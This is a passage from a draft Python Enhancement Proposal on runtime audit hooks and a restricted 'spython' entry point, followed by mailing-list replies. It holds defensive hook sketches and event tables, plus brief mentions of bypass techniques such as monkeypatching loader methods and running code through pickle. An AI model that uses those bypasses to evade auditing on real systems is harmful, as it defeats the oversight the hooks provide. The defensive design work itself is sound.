   ``_ctypes._CData``, ``ctypes.cdata``, "``(ptr_as_int,)``", "Detect when code
   is accessing arbitrary memory using ``ctypes``."
   ``id``, ``id``, "``(id_as_int,)``", "Detect when code is accessing the id of
   objects, which in CPython reveals information about memory layout."
   ``sys._getframe``, ``sys._getframe``, "``(frame_object,)``", "Detect when
   code is accessing frames directly."
   ``sys._current_frames``, ``sys._current_frames``, "", "Detect when code is
   accessing frames directly."
   ``PyEval_SetProfile``, ``sys.setprofile``, "", "Detect when code is injecting
   trace functions. Because of the implementation, exceptions raised from the
   hook will abort the operation, but will not be raised in Python code. Note
   that ``threading.setprofile`` eventually calls this function, so the event
   will be logged for each thread."
   ``PyEval_SetTrace``, ``sys.settrace``, "", "Detect when code is injecting
   trace functions. Because of the implementation, exceptions raised from the
   hook will abort the operation, but will not be raised in Python code. Note
   that ``threading.settrace`` eventually calls this function, so the event
   will be logged for each thread."
   ``_PyEval_SetAsyncGenFirstiter``, ``sys.set_async_gen_firstiter``, "", "Detect
   changes to async generator hooks."
   ``_PyEval_SetAsyncGenFinalizer``, ``sys.set_async_gen_finalizer``, "", "Detect
   changes to async generator hooks."
   ``_PyEval_SetCoroutineWrapper``, ``sys.set_coroutine_wrapper``, "", "Detect
   changes to the coroutine wrapper."
   ``Py_SetRecursionLimit``, ``sys.setrecursionlimit``, "``(new_limit,)``", "Detect
   changes to the recursion limit."
   ``_PyEval_SetSwitchInterval``, ``sys.setswitchinterval``, "``(interval_us,)``", "Detect
   changes to the switching interval."
   "``socket.bind``, ``socket.connect``, ``socket.connect_ex``, ``socket.sendmsg``, ``socket.sendto``", ``socket.address``, "``(address,)``", "Detect
   access to network resources. The address is unmodified from the original
   call."
   ``socket.__init__``, "socket()", "``(family, type, proto)``", "Detect
   creation of sockets. The arguments will be int values."
   ``socket.gethostname``, ``socket.gethostname``, "", "Detect attempts to
   retrieve the current host name."
   ``socket.sethostname``, ``socket.sethostname``, "``(name,)``", "Detect
   attempts to change the current host name. The name argument is passed as a
   bytes object."
   "``socket.gethostbyname``, ``socket.gethostbyname_ex``", ``socket.gethostbyname``, "``(name,)``", "Detect
   host name resolution. The name argument is a str or bytes object."
   ``socket.gethostbyaddr``, ``socket.gethostbyaddr``, "``(address,)``", "Detect
   host resolution. The address argument is a str or bytes object."
   ``socket.getservbyname``, ``socket.getservbyname``, "``(name, protocol)``", "Detect
   service resolution. The arguments are str objects."
   ``socket.getservbyport``, ``socket.getservbyport``, "``(port, protocol)``", "Detect
   service resolution. The port argument is an int and protocol is a str."

TODO - more hooks in ``_socket``, ``_ssl``, others?
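
As an illustration of how a hook might consume the events in Table 1, the
following hypothetical hook records every event and aborts only
``ctypes.dlopen`` calls for libraries outside an allowlist. The allowlist
contents and the in-memory ``recorded`` list are assumptions standing in for a
real policy and a real log destination.

```python
# Hypothetical log hook for the events in Table 1. It records every event
# unfiltered and aborts only native library loads outside an allowlist.
ALLOWED_NATIVE_LIBRARIES = {"libc.so.6"}  # illustrative assumption

recorded = []  # stand-in for a real log destination


def table1_hook(event, args):
    recorded.append((event, args))  # log first, before any decision
    if event == "ctypes.dlopen":
        (module_or_path,) = args
        if module_or_path not in ALLOWED_NATIVE_LIBRARIES:
            raise PermissionError(f"native library blocked: {module_or_path!r}")
    # Per Table 1, exceptions raised for "sys.settrace" or "sys.setprofile"
    # would abort the operation but are not propagated to Python code.
```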


SPython Entry Point
===================

A new entry point binary will be added, called ``spython.exe`` on Windows and
``spythonX.Y`` on other platforms. This entry point is intended primarily as
an example, as we expect most users of this functionality to implement their
own entry point and hooks (see `Recommendations`_). It will also be used for
tests.

Source builds will create ``spython`` by default, but distributors may choose
whether to include ``spython`` in their pre-built packages. The python.org
managed binary distributions will not include ``spython``.

**Do not accept most command-line arguments**

The ``spython`` entry point requires that a script file be passed as the first
argument, and does not allow any options. This prevents arbitrary code
execution from in-memory data or non-script files (such as pickles, which can
be executed using ``-m pickle <path>``).

Options ``-B`` (do not write bytecode), ``-E`` (ignore environment variables)
and ``-s`` (no user site) are assumed.
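
The argument policy above can be sketched in Python, although the real entry
point would be written in C. ``script_from_argv`` is a hypothetical helper,
and passing the arguments that follow the script through to it unchanged is an
assumption, since this section only says that options are not allowed.

```python
def script_from_argv(argv):
    """Return (script, script_args), rejecting interpreter options (sketch)."""
    if len(argv) < 2:
        raise ValueError("a script file must be passed as the first argument")
    script = argv[1]
    # Rejects "-c", "-m pickle <path>", "-" (stdin) and every other option.
    if script.startswith("-"):
        raise ValueError(f"options are not accepted: {script!r}")
    # Assumption: anything after the script belongs to the script itself.
    return script, argv[2:]
```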

If a file with the same full path as the process with a ``._pth`` suffix
(``spython._pth`` on Windows, ``spythonX.Y._pth`` on Linux) exists, it will be
used to initialize ``sys.path`` following the rules currently described `for
Windows <https://docs.python.org/3/using/windows.html#finding-modules>`_.
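
Deriving the ``._pth`` location needs a little care, because the Windows name
replaces the ``.exe`` extension while the POSIX name appends to a versioned
file name. A minimal sketch, with ``pth_path`` as a hypothetical helper:

```python
import ntpath


def pth_path(executable, windows):
    """Return the ._pth file that sits beside the entry point (sketch)."""
    if windows:
        root, ext = ntpath.splitext(executable)
        if ext.lower() == ".exe":
            executable = root  # spython.exe -> spython._pth
    # On other platforms append rather than use splitext(): splitting
    # "spython3.7" would wrongly treat ".7" as an extension.
    return executable + "._pth"
```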

**Log security events to a file**

Before initialization, ``spython`` will set a log hook that writes events to a
local file. By default, this file is the full path of the process with a
``.log`` suffix, but may be overridden with the ``SPYTHONLOG`` environment
variable (despite such overrides being explicitly discouraged in
`Recommendations`_).

The log hook will also abort all ``addloghook`` events, preventing any other
hooks from being added.
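
A minimal sketch of such a file-logging hook, written against a plain
``(event, args)`` callable as described for log hooks in this PEP.
``make_file_log_hook`` is hypothetical, the JSON-lines format is an
assumption, and the sketch takes an already-open file rather than resolving
the ``.log`` path or ``SPYTHONLOG`` itself. Arguments are stored with
``repr()`` because many of them (frames, library objects) cannot be
serialized directly.

```python
import json
import time


def make_file_log_hook(log_file):
    """Return a hook that writes one JSON line per event (hypothetical sketch)."""

    def hook(event, args):
        record = {"time": time.time(), "event": event,
                  "args": [repr(arg) for arg in args]}
        log_file.write(json.dumps(record) + "\n")
        log_file.flush()  # keep the record even if the process dies next
        # Written before aborting, so the attempt itself is always recorded.
        if event == "sys.addloghook":
            raise RuntimeError("adding log hooks is not permitted")

    return hook
```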

On Windows, code from ``compile`` events will be submitted to AMSI [5]_ and if
it fails to validate, the compile event will be aborted. This can be tested by
calling ``compile()`` or ``eval()`` on the contents of the `EICAR test file
<http://www.eicar.org/86-0-Intended-use.html>`_.

**Restrict importable modules**

Also before initialization, ``spython`` will set an open-for-execute hook that
validates all files opened with ``os.open_for_exec``. This implementation will
require all files to have a ``.py`` suffix (thereby blocking the use of cached
bytecode), and will raise a custom log event ``spython.open_for_exec``
containing ``(filename, True_if_allowed)``.
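
The open-for-execute hook described above might look like this in Python.
``restrict_to_source`` is a hypothetical name, and its ``log`` parameter
stands in for the proposed ``sys.loghook(event, args)`` so the sketch runs on
current interpreters; the event name and argument tuple follow the text.

```python
import io
import os


def restrict_to_source(pathlike, log):
    """Open-for-execute hook modelled on the spython description (sketch).

    ``log`` stands in for the proposed sys.loghook(event, args).
    """
    path = os.fspath(pathlike)
    allowed = path.endswith(".py")  # blocks cached bytecode and other files
    log("spython.open_for_exec", (path, allowed))  # raised whether allowed or not
    if not allowed:
        raise PermissionError(f"only .py files may be executed: {path!r}")
    return io.open(path, "rb")
```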

On Windows, the hook will also open the file with flags that prevent any other
process from opening it with write access, which allows the hook to perform
additional validation on the contents with confidence that it will not be
modified between the check and use. Compilation will later trigger a
``compile`` event, so there is no need to read the contents now for AMSI, but
other validation mechanisms such as DeviceGuard [4]_ should be performed here.


Performance Impact
==================

**TODO**

Full impact analysis still requires investigation. Preliminary testing shows
that calling ``sys.loghook`` with no hooks added does not significantly affect
any existing benchmarks, though targeted microbenchmarks can observe an
impact.

The performance impact of using ``spython`` or of adding hooks is not of
interest here, since this is considered opt-in functionality.
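
One way a targeted microbenchmark might isolate the cost of a hook call with
no hooks registered is to time an empty dispatch loop against a no-op call of
the same shape. This pure-Python stand-in (``loghook`` and
``per_call_seconds`` are hypothetical) only illustrates the measurement; it
says nothing about the overhead of the proposed C implementation, which would
need to be measured directly.

```python
import timeit

_hooks = []  # hypothetical hook list, empty as in the default configuration


def loghook(event, args):
    for hook in _hooks:
        hook(event, args)


def no_op(event, args):
    pass


def per_call_seconds(number=200_000):
    """Time an empty-hook dispatch against a plain no-op call of the same shape."""
    dispatch = timeit.timeit(lambda: loghook("id", (1,)), number=number)
    baseline = timeit.timeit(lambda: no_op("id", (1,)), number=number)
    return dispatch / number, baseline / number
```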


Recommendations
===============

Specific recommendations are difficult to make, as the ideal
configuration for any environment will depend on the user's ability to
manage, monitor, and respond to activity on their own network. However,
many of the proposals here do not appear to be of value without deeper
illustration. This section provides recommendations using the terms
**should** (or **should not**), indicating that we consider it dangerous
to ignore the advice, and **may**, indicating that the advice ought
to be considered for high-value systems. The term **sysadmins** refers
to whoever is responsible for deploying Python throughout your network,
though different organizations may have different titles for the
relevant person.

Sysadmins **should** build their own entry point, likely starting from
``spython``, and directly interface with the security systems available
in their environment. The more tightly integrated, the less likely a
vulnerability will be found allowing an attacker to bypass those
systems. In particular, the entry point **should not** obtain any
settings from the current environment, such as environment variables,
unless those settings are otherwise protected from modification.

The default ``python`` entry point **should not** be deployed to
production machines, but could be given to developers to use and test
Python on non-production machines. Sysadmins **may** consider deploying
a less restrictive version of their entry point to developer machines,
since any system connected to your network is a potential target.

Python deployments **should** be made read-only using any available
platform functionality after deployment and during use.

On platforms that support it, sysadmins **should** include signatures
for every file in a Python deployment, ideally verified using a private
certificate. For example, Windows supports embedding signatures in
executable files and using catalogs for others, and can use DeviceGuard
[4]_ to validate signatures either automatically or using an
``open_for_exec`` hook.

Sysadmins **should** collect as many logged events as possible, and
**should** copy them off local machines frequently. Even if logs are
not being constantly monitored for suspicious activity, once an attack
is detected it is too late to enable logging. Log hooks **should not**
attempt to preemptively filter events, as even benign events are useful
when analyzing the progress of an attack. (Watch the "No Easy Breach"
video under `Further Reading`_ for a deeper look at this side of things.)

Log hooks **should** write events to logs before attempting to abort. As
discussed earlier, it is more important to record malicious actions than
to prevent them. Very few actions should be aborted, as most will occur
during normal use. Sysadmins **may** audit their Python code and abort
operations that are known to never be used deliberately.
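
One way to act on that advice, sketched under stated assumptions: record which
sensitive events the deployed code actually raises during an audit run, then
in production log every event and abort only sensitive events that never
appeared. ``make_audited_hook`` and the contents of ``SENSITIVE_EVENTS`` are
hypothetical choices, not recommendations from this PEP.

```python
# Which events count as sensitive is an illustrative assumption.
SENSITIVE_EVENTS = {"ctypes.dlopen", "sys.settrace", "sys.setprofile",
                    "sys._current_frames"}


def make_audited_hook(used_during_audit, sink):
    """Log every event, then abort sensitive ones never seen while auditing."""

    def hook(event, args):
        sink.append((event, args))  # 1. always record the event first
        if event in SENSITIVE_EVENTS and event not in used_during_audit:
            # 2. only then abort the operation
            raise PermissionError(f"{event} is not used by audited code")

    return hook
```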

On production machines, the first log hook **should** be set in C code
before ``Py_Initialize`` is called, and that hook **should**
unconditionally abort the ``sys.addloghook`` event. The Python interface
is mainly useful for testing.

On production machines, a non-validating ``open_for_exec`` hook **may**
be set in C code before ``Py_Initialize`` is called. This prevents later
code from overriding the hook; however, logging the
``setopenforexecutehandler`` event is useful since no code should ever
need to call it. Using at least the sample ``open_for_exec`` hook
implementation from ``spython`` is recommended.

[TODO: more good advice; less bad advice]

Further Reading
===============


**Redefining Malware: When Old Terms Pose New Threats**
   By Aviv Raff for SecurityWeek, 29th January 2014

   This article, and those linked by it, are high-level summaries of the rise
   of APTs and the differences from "traditional" malware.

   `<http://www.securityweek.com/redefining-malware-when-old-terms-pose-new-threats>`_

**Anatomy of a Cyber Attack**
   By FireEye, accessed 23rd August 2017

   A summary of the techniques used by APTs, and links to a number of relevant
   whitepapers.

   `<https://www.fireeye.com/current-threats/anatomy-of-a-cyber-attack.html>`_

**Automated Traffic Log Analysis: A Must Have for Advanced Threat Protection**
   By Aviv Raff for SecurityWeek, 8th May 2014

   High-level summary of the value of detailed logging and automatic analysis.

   `<http://www.securityweek.com/automated-traffic-log-analysis-must-have-advanced-threat-protection>`_

**No Easy Breach: Challenges and Lessons Learned from an Epic Investigation**
   Video presented by Matt Dunwoody and Nick Carr for Mandiant at ShmooCon 2016

   Detailed walkthrough of the processes and tools used in detecting and
   removing an APT.

   `<https://archive.org/details/No_Easy_Breach>`_

**Disrupting Nation State Hackers**
   Video presented by Rob Joyce for the NSA at USENIX Enigma 2016

   Good security practices, capabilities and recommendations from the chief of
   NSA's Tailored Access Operations.

   `<https://www.youtube.com/watch?v=bDJb8WOJYdA>`_

References
==========

.. [1] Assume Breach Mindset, `<http://asian-power.com/node/11144>`_

.. [2] PowerShell Loves the Blue Team, also known as Scripting Security and
   Protection Advances in Windows 10,
   `<https://blogs.msdn.microsoft.com/powershell/2015/06/09/powershell-the-blue-team/>`_

.. [3] `<https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html>`_

.. [4] `<https://aka.ms/deviceguard>`_

.. [5] AMSI,
   `<https://msdn.microsoft.com/en-us/library/windows/desktop/dn889587(v=vs.85).aspx>`_

.. [6] Persistent Zone Identifiers,
   `<https://msdn.microsoft.com/en-us/library/ms537021(v=vs.85).aspx>`_

.. [7] Event tracing,
   `<https://msdn.microsoft.com/en-us/library/aa363668(v=vs.85).aspx>`_

.. [8] `<https://www.gnupg.org/>`_

.. [9] `<https://www.systutorials.com/docs/linux/man/3-sd_journal_send/>`_

.. [10] `<http://www.trustedbsd.org/openbsm.html>`_

.. [11] `<https://linux.die.net/man/3/syslog>`_

Acknowledgments
===============

Thanks to all the people from Microsoft involved in helping make the Python
runtime safer for production use, and especially to James Powell for doing
much of the initial research, analysis and implementation, Lee Holmes for
invaluable insights into the info-sec field and PowerShell's responses, and
Brett Cannon for the grounding discussions.

Copyright
=========

Copyright (c) 2017 by Microsoft Corporation. This material may be distributed
only subject to the terms and conditions set forth in the Open Publication
License, v1.0 or later (the latest version is presently available at
http://www.opencontent.org/openpub/).

From steve.dower at python.org  Sat Aug 26 13:05:21 2017
From: steve.dower at python.org (Steve Dower)
Date: Sat, 26 Aug 2017 10:05:21 -0700
Subject: [Security-sig] PEP 551: Security transparency in the Python
 runtime
In-Reply-To: <E1dldEX-0000N5-EP@se2-syd.hostedmail.net.au>
References: <ef0793c8-8a95-3807-a5d9-fa95c58e731d@python.org>
 <CAP1=2W6Kmjfrkg49hkT8B--cZmO=Nd4W4cvjrrYL8NoJbGuxxw@mail.gmail.com>
 <E1dl4HZ-0007dO-Sb@se2-syd.hostedmail.net.au>
 <CAP1=2W43bRebitrQpRbR0U0z2AusGozutDWyaFL1vjD-8UAmyg@mail.gmail.com>
 <E1dldEX-0000N5-EP@se2-syd.hostedmail.net.au>
Message-ID: <78d17f2e-50b6-4bd5-0c24-7d657a3ec3b1@python.org>

On 26Aug2017 0842, Steve Dower wrote:
>> Is there going to be a visible flag or anything to know you're running a
>> restricted version of Python? If so then a subclass will allow us to
>> override get_code() so that it just skips .pyc files and it can be used
>> automatically when the flag is set. That way users of spython don't have
>> to think about setting that up. Otherwise we could provide a function in
>> importlib._bootstrap that you call during initialization to turn this on.
>
> The idea is that importlib and similar code should just use
> open_for_exec when they're opening files that will be executed, and let
> the hook (if any) worry about validating extensions. The overridden
> function is needed because as you said, there's currently one open call
> that is used for opening both code and data files, and for data files it
> should just use regular open(). The override can just be permanently
> there, since with no hook there's no difference. (And custom subclasses
> may also need updating, which gets back to "if you don't control the
> code that's running then none of these protections will protect you" and
> you have to rely on audit hooks.)

And thinking through how to avoid this being trivially bypassed (spoiler 
- it'll always be trivial) has led to adding more audit hooks for 
monkeypatching (set __bases__, set __class__, type.__setattr__, etc.).

Those could also be useful as debugging/coverage tools, and the sort of 
thing you'd use a Python hook for in test code to see what nasty things 
are being done by your dependencies, even if you have no intention of 
tracking them in production.

But between those, a simple isinstance(self, SourceLoader) in 
FileLoader, and guidance in the PEP, I don't think there's any value in 
investing too heavily in preventing people from doing 
`FileLoader.get_data = my_get_data` (which at least requires multiple 
lines of Python code, compared to `del SourceFileLoader.get_data` if 
using a simple override).
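
A minimal sketch of the loader-subclass approach discussed above: it overrides
``get_code()`` so code is always compiled from the ``.py`` source and cached
bytecode is neither read nor written. It uses only the existing
``importlib.machinery.SourceFileLoader`` API; ``SourceOnlyLoader`` and
``load_source_only`` are hypothetical names, and it does not route through
``open_for_exec``, which is still only proposed.

```python
import importlib.machinery
import importlib.util


class SourceOnlyLoader(importlib.machinery.SourceFileLoader):
    """Always compile from source; never read or write .pyc files (sketch)."""

    def get_code(self, fullname):
        path = self.get_filename(fullname)
        source = self.get_data(path)  # raw bytes of the .py file
        return self.source_to_code(source, path)


def load_source_only(name, path):
    # Hypothetical helper: load one module from an explicit path.
    loader = SourceOnlyLoader(name, path)
    spec = importlib.util.spec_from_file_location(name, path, loader=loader)
    module = importlib.util.module_from_spec(spec)
    loader.exec_module(module)
    return module
```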

Cheers,
Steve

From christian at python.org  Sat Aug 26 13:18:36 2017
From: christian at python.org (Christian Heimes)
Date: Sat, 26 Aug 2017 19:18:36 +0200
Subject: [Security-sig] PEP 551: Security transparency in the Python
 runtime
In-Reply-To: <CAP1=2W43bRebitrQpRbR0U0z2AusGozutDWyaFL1vjD-8UAmyg@mail.gmail.com>
References: <ef0793c8-8a95-3807-a5d9-fa95c58e731d@python.org>
 <CAP1=2W6Kmjfrkg49hkT8B--cZmO=Nd4W4cvjrrYL8NoJbGuxxw@mail.gmail.com>
 <E1dl4HZ-0007dO-Sb@se2-syd.hostedmail.net.au>
 <CAP1=2W43bRebitrQpRbR0U0z2AusGozutDWyaFL1vjD-8UAmyg@mail.gmail.com>
Message-ID: <106f1a1a-c882-afc4-1cc1-b571617aa763@python.org>

On 2017-08-26 15:45, Brett Cannon wrote:
> Is there going to be a visible flag or anything to know you're running a
> restricted version of Python? If so then a subclass will allow us to
> override get_code() so that it just skips .pyc files and it can be used
> automatically when the flag is set. That way users of spython don't have
> to think about setting that up. Otherwise we could provide a function in
> importlib._bootstrap that you call during initialization to turn this on.

We should add a new attribute to sys.flags, e.g. sys.flags.restricted.

In fact there should be two new flags. We need a way to prevent
interactive Python shells like cmd module and pdb interactive mode.
After all we want to prevent hackers from getting access to an
interactive Python prompt. The cmd module implements such an interactive
command interpreter.

Christian

From steve.dower at python.org  Sat Aug 26 13:31:32 2017
From: steve.dower at python.org (Steve Dower)
Date: Sat, 26 Aug 2017 10:31:32 -0700
Subject: [Security-sig] PEP 551: Security transparency in the Python
 runtime
In-Reply-To: <106f1a1a-c882-afc4-1cc1-b571617aa763@python.org>
References: <ef0793c8-8a95-3807-a5d9-fa95c58e731d@python.org>
 <CAP1=2W6Kmjfrkg49hkT8B--cZmO=Nd4W4cvjrrYL8NoJbGuxxw@mail.gmail.com>
 <E1dl4HZ-0007dO-Sb@se2-syd.hostedmail.net.au>
 <CAP1=2W43bRebitrQpRbR0U0z2AusGozutDWyaFL1vjD-8UAmyg@mail.gmail.com>
 <106f1a1a-c882-afc4-1cc1-b571617aa763@python.org>
Message-ID: <c74d22e5-bc35-64de-0cb7-b85df57b4da5@python.org>

On 26Aug2017 1018, Christian Heimes wrote:
> On 2017-08-26 15:45, Brett Cannon wrote:
>> Is there going to be a visible flag or anything to know you're running a
>> restricted version of Python? If so then a subclass will allow us to
>> override get_code() so that it just skips .pyc files and it can be used
>> automatically when the flag is set. That way users of spython don't have
>> to think about setting that up. Otherwise we could provide a function in
>> importlib._bootstrap that you call during initialization to turn this on.
>
> We should add a new attribute to sys.flags, e.g. sys.flags.restricted.

When would the flag be enabled? Currently my proposed changes are 
available all the time, and by design there's no way to know whether 
calls to PySys_LogHook() or open_for_exec() have been hooked or not.

If it can be optionally enabled by the entry point (i.e. spython.c 
enables it but python.c does not), then that would make sense, but I'd 
have to recommend that entry points should probably not set it unless 
they want to reveal that they're auditing the process :)

> In fact there should be two new flags. We need a way to prevent
> interactive Python shells like cmd module and pdb interactive mode.
> After all we want to prevent hackers from getting access to an
> interactive Python prompt. The cmd module implements such an interactive
> command interpreter.

The only reliable way to do this is to remove the modules when you 
deploy to production. Otherwise, the best protection is the fact that 
your code that imports and starts them has already gotten past 
open_for_exec() and whatever your import and compile hooks do (malware 
scan, blocklist, etc.).

Also, interactive prompts are only really used so that attackers can 
pipe code into stdin. If someone is already interactive on your box, 
you're in more trouble than can be solved by blocking interactive Python 
(and if you're at least semi-serious about security, there are already 
hundreds of red flag events).

Cheers,
Steve

From steve.dower at python.org  Mon Aug 28 13:08:06 2017
From: steve.dower at python.org (Steve Dower)
Date: Mon, 28 Aug 2017 10:08:06 -0700
Subject: [Security-sig] PEP 551: Security transparency in the Python
 runtime
In-Reply-To: <c74d22e5-bc35-64de-0cb7-b85df57b4da5@python.org>
References: <ef0793c8-8a95-3807-a5d9-fa95c58e731d@python.org>
 <CAP1=2W6Kmjfrkg49hkT8B--cZmO=Nd4W4cvjrrYL8NoJbGuxxw@mail.gmail.com>
 <E1dl4HZ-0007dO-Sb@se2-syd.hostedmail.net.au>
 <CAP1=2W43bRebitrQpRbR0U0z2AusGozutDWyaFL1vjD-8UAmyg@mail.gmail.com>
 <106f1a1a-c882-afc4-1cc1-b571617aa763@python.org>
 <c74d22e5-bc35-64de-0cb7-b85df57b4da5@python.org>
Message-ID: <2384c0d1-df7e-1cba-f9c6-1c12ebb779c9@python.org>

I'm preparing to bring this PEP to python-dev early this week (since I'm 
keen to get the core team talking about it before we meet up next week 
for the sprints). I have a set of changes in a PR at 
https://github.com/python/peps/pull/378/files if anyone wants to add 
more feedback before I merge and post.

The summary of changes:
* rename "event log hook" to "audit hook" (including PySys_Audit, 
PySys_AddAuditHook, etc.)
* added audit points to better handle compile/exec of non-string 
objects, monkeypatching, and pickle.find_class
  - (more audit hooks will come - this is still an incomplete list)
* improved recommendations
* more clarity around the purpose of `spython`
* rejected ideas (separate `audit` module, `sys.flags.XXX`)

Comments by email are preferred, but if you'd rather comment directly on 
the PR then feel free. I'll see them eventually.

You can also look at my current implementation compared to master at:

   https://github.com/python/cpython/compare/master...zooba:sectrans

Thanks,
Steve